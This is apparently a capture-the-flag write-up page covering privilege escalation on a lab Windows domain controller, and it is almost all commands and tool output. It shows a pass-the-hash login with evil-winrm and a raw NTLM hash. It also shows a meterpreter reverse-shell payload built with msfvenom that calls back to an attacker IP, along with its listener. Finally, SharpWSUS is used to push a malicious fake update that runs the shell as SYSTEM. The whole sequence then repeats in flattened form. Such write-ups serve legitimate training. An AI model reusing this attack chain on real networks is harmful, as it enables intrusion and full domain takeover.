Priv Esc

evil-winrm -i 10.10.11.175 -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5

*Evil-WinRM* PS C:\Users\sflowers> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
    SetActiveHours    REG_DWORD    0x1
    ActiveHoursStart    REG_DWORD    0x0
    ActiveHoursEnd    REG_DWORD    0x17
    AcceptTrustedPublisherCerts    REG_DWORD    0x1
    ExcludeWUDriversInQualityUpdate    REG_DWORD    0x1
    DoNotConnectToWindowsUpdateInternetLocations    REG_DWORD    0x1
    WUServer    REG_SZ    http://wsus.outdated.htb:8530
    WUStatusServer    REG_SZ    http://wsus.outdated.htb:8530
    UpdateServiceUrlAlternate    REG_SZ

adot@pwndot:~/opt$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4443 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

adot@pwndot:~$ msfconsole -q -x 'use exploit/multi/handler;set LHOST tun0; set LPORT 4443; set payload windows/x64/meterpreter/reverse_tcp; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
LHOST => tun0
LPORT => 4443
payload => windows/x64/meterpreter/reverse_tcp
[*] Started reverse TCP handler on 10.10.14.18:4443

Compile, upload and run

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\sharpwsus.exe create /payload:"C:\programdata\psexec.exe" /args:"-accepteula -s -d C:\programdata\shell.exe" /title:"Pwned"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: psexec.exe
[*] Payload Path: C:\programdata\psexec.exe
[*] Arguments: -accepteula -s -d C:\programdata\shell.exe
[*] Arguments (HTML Encoded): -accepteula -s -d C:\programdata\shell.exe

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent

ImportUpdate
Update Revision ID: 30
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 31
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe approve /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:DC.outdated.htb /groupname:"PwnedLOL"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update

Targeting DC.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
DC.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: PwnedLOL
Added Computer To Group
Approved Update

[*] Approve complete

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe check /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:DC.outdated.htb /groupname:"PwnedLOL"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Check Update

Targeting DC.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
DC.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1

[*] Update is installed

[*] Check complete

PreviousFoothold NextCredentials

Last updated 1 day ago

Was this helpful?

*Evil-WinRM* PS C:\Users\sflowers> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate SetActiveHours REG_DWORD 0x1 ActiveHoursStart REG_DWORD 0x0 ActiveHoursEnd REG_DWORD 0x17 AcceptTrustedPublisherCerts REG_DWORD 0x1 ExcludeWUDriversInQualityUpdate REG_DWORD 0x1 DoNotConnectToWindowsUpdateInternetLocations REG_DWORD 0x1 WUServer REG_SZ http://wsus.outdated.htb:8530 WUStatusServer REG_SZ http://wsus.outdated.htb:8530 UpdateServiceUrlAlternate REG_SZ

adot@pwndot:~/opt$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 LPORT=4443 -f exe > shell.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes

adot@pwndot:~$ msfconsole -q -x 'use exploit/multi/handler;set LHOST tun0; set LPORT 4443; set payload windows/x64/meterpreter/reverse_tcp; run' [*] Starting persistent handler(s)... [*] Using configured payload generic/shell_reverse_tcp LHOST => tun0 LPORT => 4443 payload => windows/x64/meterpreter/reverse_tcp [*] Started reverse TCP handler on 10.10.14.18:4443

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\sharpwsus.exe create /payload:"C:\programdata\psexec.exe" /args:"-accepteula -s -d C:\programdata\shell.exe" /title:"Pwned" ____ _ __ ______ _ _ ____ / ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___| \___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) | |____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team [*] Action: Create Update [*] Creating patch to use the following: [*] Payload: psexec.exe [*] Payload Path: C:\programdata\psexec.exe [*] Arguments: -accepteula -s -d C:\programdata\shell.exe [*] Arguments (HTML Encoded): -accepteula -s -d C:\programdata\shell.exe ################# WSUS Server Enumeration via SQL ################## ServerName, WSUSPortNumber, WSUSContentLocation ----------------------------------------------- DC, 8530, c:\WSUS\WsusContent ImportUpdate Update Revision ID: 30 PrepareXMLtoClient InjectURL2Download DeploymentRevision PrepareBundle PrepareBundle Revision ID: 31 PrepareXMLBundletoClient DeploymentRevision [*] Update created - When ready to deploy use the following command: [*] SharpWSUS.exe approve /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN /groupname:"Group Name" [*] To check on the update status use the following command: [*] SharpWSUS.exe check /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN [*] To delete the update use the following command: [*] SharpWSUS.exe delete /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:Target.FQDN /groupname:"Group Name" [*] Create complete

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe approve /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:DC.outdated.htb /groupname:"PwnedLOL" ____ _ __ ______ _ _ ____ / ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___| \___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) | |____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team [*] Action: Approve Update Targeting DC.outdated.htb TargetComputer, ComputerID, TargetID ------------------------------------ DC.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1 Group Exists = False Group Created: PwnedLOL Added Computer To Group Approved Update [*] Approve complete

*Evil-WinRM* PS C:\Users\sflowers\Documents> .\SharpWSUS.exe check /updateid:da80d522-aefa-44c7-9ed9-42970cb23af8 /computername:DC.outdated.htb /groupname:"PwnedLOL" ____ _ __ ______ _ _ ____ / ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___| \___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) | |____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team [*] Action: Check Update Targeting DC.outdated.htb TargetComputer, ComputerID, TargetID ------------------------------------ DC.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1 [*] Update is installed [*] Check complete